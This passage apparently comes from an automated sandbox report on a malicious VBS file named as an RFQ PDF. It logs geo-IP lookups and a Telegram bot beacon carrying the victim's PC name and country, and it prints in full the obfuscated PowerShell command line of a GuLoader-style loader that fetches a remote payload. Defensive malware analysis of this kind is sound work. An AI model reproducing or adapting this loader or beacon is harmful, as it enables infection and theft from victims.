                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.449821188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:30 UTC63OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-10-24 06:43:30 UTC891INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:30 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 6
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UdS53swdOxVWmv%2FDDNzLBtido0rZxRZ2EeHvetxrT3PLBKdL7H2HhO23uWDhrDPjwI3wGzRuxM%2BRs80fmzvSXV%2Bc65fpVrTFIlJPh3fAULnniwZHenvIHfoHXYEb0BMrAga8%2FIfN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe31ff8b316e-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1362&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2078966&cwnd=47&unsent_bytes=0&cid=8c2ca4645488967c&ts=146&x=0"
                                                                2024-10-24 06:43:30 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.449828188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:31 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:31 UTC896INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:31 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 7
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DhTfu%2FiwZ91lGTPSDbVLEleLN0Yu6MLOSMxksSU7UIGAwuGJoLRVQg6%2B51I3TsvVzqbFgnw3TQPUEuQUY%2BqehJSlh4tFlJj%2FfdjAeKn6QsEdJUHN6QZ%2FFEklziIlNo85vGq2ocv%2B"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe3c1948477a-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1938&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1458942&cwnd=226&unsent_bytes=0&cid=03a65fa5beb1ecec&ts=151&x=0"
                                                                2024-10-24 06:43:31 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.449840188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:33 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:33 UTC888INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:33 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 9
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5Ox1hNscqVdIra8SYRpIgDtpeFu83TFbBtyTkSFh1ew9vPwC7Inap7laCiy0czik4Z42uD8z%2FWB%2BMXC1OQCnj7apeuufyornja1710DVO9oe9WxRN0Io7uwn4lXxpijTkLXxx3L"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe461bf96b97-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2452159&cwnd=251&unsent_bytes=0&cid=4bce0c6452b5874e&ts=149&x=0"
                                                                2024-10-24 06:43:33 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.449852188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:34 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:35 UTC893INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:35 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 11
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkxIywk78GZf4wZb2GtcABGjUwun0NI3h6NeOKfB%2BmKKHeXXqoURIB36IFeUQEnGBEZTuNfKL7YLfqI3eTVc%2FSAjgP7RvsSseQdI4CHDJqG1%2BVO2AG4o%2FZMTZrVpLOYJIj5uFOEj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe501d224617-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1069&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2669124&cwnd=251&unsent_bytes=0&cid=545f244658b9a945&ts=145&x=0"
                                                                2024-10-24 06:43:35 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.449864188.114.97.34435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:36 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:36 UTC891INHTTP/1.1 200 OK
                                                                Date: Thu, 24 Oct 2024 06:43:36 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 12
                                                                Last-Modified: Thu, 24 Oct 2024 06:43:24 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zB2QGLslPya92QRUXy3x4xHQzf6IenZBYLHpg1JLdspYpRr85Wt%2FJ7KdlOj9YL0xjQalWRwMSsRJNI4jSVYxY%2FpjlDTNor0qB8iiq%2BYsQx68f1mPwe1AviqrY4DBqoOpCCFRxDOG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d77fe5a2ae1e95e-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1293&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2217457&cwnd=251&unsent_bytes=0&cid=c65aa76834c1f682&ts=149&x=0"
                                                                2024-10-24 06:43:36 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                2024-10-24 06:43:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.449867149.154.167.2204435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:37 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2024/10/2024%20/%2017:25:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                Host: api.telegram.org
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:37 UTC344INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.18.0
                                                                Date: Thu, 24 Oct 2024 06:43:37 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 55
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                2024-10-24 06:43:37 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:02:42:18
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs"
                                                                Imagebase:0x7ff612060000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:02:42:21
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1951410104.0000026815481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:02:42:21
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:02:42:41
                                                                Start date:24/10/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
